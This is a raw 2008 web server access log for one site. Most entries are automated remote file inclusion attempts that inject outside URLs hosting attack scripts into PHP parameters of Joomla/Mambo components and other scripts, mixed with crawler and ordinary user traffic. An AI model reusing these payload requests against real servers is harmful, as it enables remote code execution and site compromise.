70.85.102.100 - - [19/Jul/2008:10:26:34 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.geocities.com/marlinarika/test.txt??? HTTP/1.1" 200 18549 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:26:41 -0700] "GET /logs/access.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:26:42 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:26:42 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:26:45 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:26:45 -0700] "GET /errors.php?error=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:26:49 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:26:50 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:26:50 -0700] "GET /logs/index2.php?x=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:26:51 -0700] "GET /logs/access_080225.log/index2.php?x=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:26:51 -0700] "GET /index2.php?x=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:27:06 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:27:06 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:27:08 -0700] "GET /bikes/CreSTOC07/CreSTOC2007082.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:27:09 -0700] "GET /logs/access_080329.log//popup_window.php?site_isp_root=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:10:27:30 -0700] "GET /logs/access.log/index2.php?x=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:28:07 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:28:09 -0700] "GET /bikes/CreSTOC07/CreSTOC2007083.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:28:15 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:10:28:27 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:10:28:27 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:10:28:27 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:10:29:02 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:29:10 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:10:29:11 -0700] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:29:13 -0700] "GET /bikes/CreSTOC07/CreSTOC2007084.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:10:29:13 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18493 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:10:29:13 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:29:14 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:29:14 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:29:14 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:29:36 -0700] "GET /logs/access_080329.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:10:29:41 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:29:49 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:30:13 -0700] "GET /bikes/CreSTOC07/CreSTOC2007085.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:30:20 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:30:20 -0700] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:10:30:29 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:10:30:30 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:10:30:34 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:10:30:34 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:10:30:35 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:30:35 -0700] "GET /logs//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:30:36 -0700] "GET //components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:10:30:40 -0700] "GET /middle.php?page=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:10:30:40 -0700] "GET /logs/access_071217.log/middle.php?page=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:10:30:40 -0700] "GET /logs/middle.php?page=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:30:46 -0700] "GET /logs//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:30:49 -0700] "GET //components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:31:13 -0700] "GET /bikes/CreSTOC07/CreSTOC2007086.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:10:31:36 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:10:31:42 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:31:45 -0700] "GET /logs/access_080225.log//cart_content.php?cart_isp_root=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:31:46 -0700] "GET /logs//cart_content.php?cart_isp_root=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:31:49 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:31:49 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:31:49 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:31:52 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:31:52 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:32:10 -0700] "GET /bikes/CreSTOC07/CreSTOC2007087.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:32:15 -0700] "GET /logs/access_080313.log/?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [19/Jul/2008:10:32:19 -0700] "GET //phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
193.178.228.12 - - [19/Jul/2008:10:32:19 -0700] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.55.137.228 - - [19/Jul/2008:10:32:21 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.230.86.116 - - [19/Jul/2008:10:32:30 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.230.86.116 - - [19/Jul/2008:10:32:31 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 200 18509 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.214.57.119 - - [19/Jul/2008:10:32:32 -0700] "GET //phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.214.57.119 - - [19/Jul/2008:10:32:32 -0700] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
204.15.10.22 - - [19/Jul/2008:10:32:32 -0700] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
204.15.10.22 - - [19/Jul/2008:10:32:32 -0700] "GET //phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:10:32:33 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:10:32:33 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
209.62.23.18 - - [19/Jul/2008:10:32:39 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [19/Jul/2008:10:32:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [19/Jul/2008:10:32:39 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [19/Jul/2008:10:32:40 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [19/Jul/2008:10:32:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [19/Jul/2008:10:32:40 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [19/Jul/2008:10:32:40 -0700] "GET /logs/access_080104.log//skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [19/Jul/2008:10:32:41 -0700] "GET /logs/access_080104.log//skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:32:43 -0700] "GET /logs/access_080329.log//cart_content.php?cart_isp_root=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:32:50 -0700] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:32:50 -0700] "GET //phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
205.234.252.183 - - [19/Jul/2008:10:32:57 -0700] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
205.234.252.183 - - [19/Jul/2008:10:32:57 -0700] "GET //phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:33:11 -0700] "GET /bikes/CreSTOC07/CreSTOC2007088.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
209.62.23.18 - - [19/Jul/2008:10:33:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [19/Jul/2008:10:33:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.226.64.33 - - [19/Jul/2008:10:33:48 -0700] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
66.226.64.33 - - [19/Jul/2008:10:33:48 -0700] "GET //phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
59.106.19.213 - - [19/Jul/2008:10:33:49 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [19/Jul/2008:10:33:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [19/Jul/2008:10:33:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [19/Jul/2008:10:33:53 -0700] "GET /logs/access_080104.log//skin/zero_vote/ask_password.php?dir=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:34:15 -0700] "GET /bikes/CreSTOC07/CreSTOC2007089.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:10:34:17 -0700] "GET /logs/access_080218.log/index.php?sub=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - - [19/Jul/2008:10:34:20 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [19/Jul/2008:10:34:24 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 32991 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [19/Jul/2008:10:34:24 -0700] "GET /warboard/css/styles_screen.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [19/Jul/2008:10:34:24 -0700] "GET /warboard/css/styles_print.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [19/Jul/2008:10:34:24 -0700] "GET /warboard/images/update.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [19/Jul/2008:10:34:24 -0700] "GET /warboard/images/delete.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [19/Jul/2008:10:34:24 -0700] "GET /warboard/images/details.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:10:34:24 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:34:27 -0700] "GET /logs/access_080305.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:34:29 -0700] "GET /logs/access_080305.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:34:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:34:41 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:10:34:47 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:10:34:50 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 200 18533 "-" "libwww-perl/5.805" "www.dmulk.com"
